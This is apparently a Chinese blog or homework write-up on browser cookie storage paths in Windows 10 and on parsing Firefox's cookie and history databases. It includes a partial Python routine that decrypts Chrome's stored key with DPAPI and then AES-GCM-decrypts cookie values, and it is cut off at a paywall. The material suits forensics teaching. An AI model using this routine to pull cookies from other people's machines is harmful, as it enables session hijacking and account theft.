这篇博客介绍了如何在Windows 10系统中获取不同浏览器(如IE、Firefox、Chrome)的Cookies存储路径,并提供了Python代码示例,特别是针对Chrome的Cookies文件。接着,通过sqlite3库连接并解析cookies.sqlite文件,展示了查询内容。最后,讲解了如何解析火狐浏览器的places.sqlite文件以获取书签和访问记录,并给出了相应的Python代码及预期输出。
第一题
win10系统中本地cookie的存放位置为:
IE浏览器:%APPDATA%\Microsoft\Windows\Cookies\ 目录中的xxx.txt文件 (IE浏览器分开存放的);
火狐浏览器:%APPDATA%\Mozilla\Firefox\Profiles\ 目录中的???.default-release或???.default目录,名为cookies.sqlite的文件;
谷歌浏览器:%LOCALAPPDATA%\Google\Chrome\User Data\Default\ 目录中,名为Cookies的文件。
使用以下代码获取你所用机器的不同浏览器的cookie的文件夹,并打印输出。
只写了一个谷歌的例子
import os import json import base64 import sqlite3 import win32crypt from cryptography.hazmat.primitives.ciphers.aead import AESGCM # 读取chrome保存在json文件中的key(str) def GetString(LocalState): with open(LocalState, 'r', encoding='utf-8') as f: s = json.load(f)['os_crypt']['encrypted_key'] return s # base64解码,DPAPI解密,得到真实的AESGCM key(bytes) def pull_the_key(base64_encrypted_key): encrypted_key_with_header = base64.b64decode(base64_encrypted_key) encrypted_key = encrypted_key_with_header[5:] key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1] return key # AESGCM解密 def DecryptString(key, data): nonce, cipherbytes = data[3:15], data[15:] aesgcm = AESGCM(key) plainbytes =
最低0.47元/天 解锁文章
9593
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
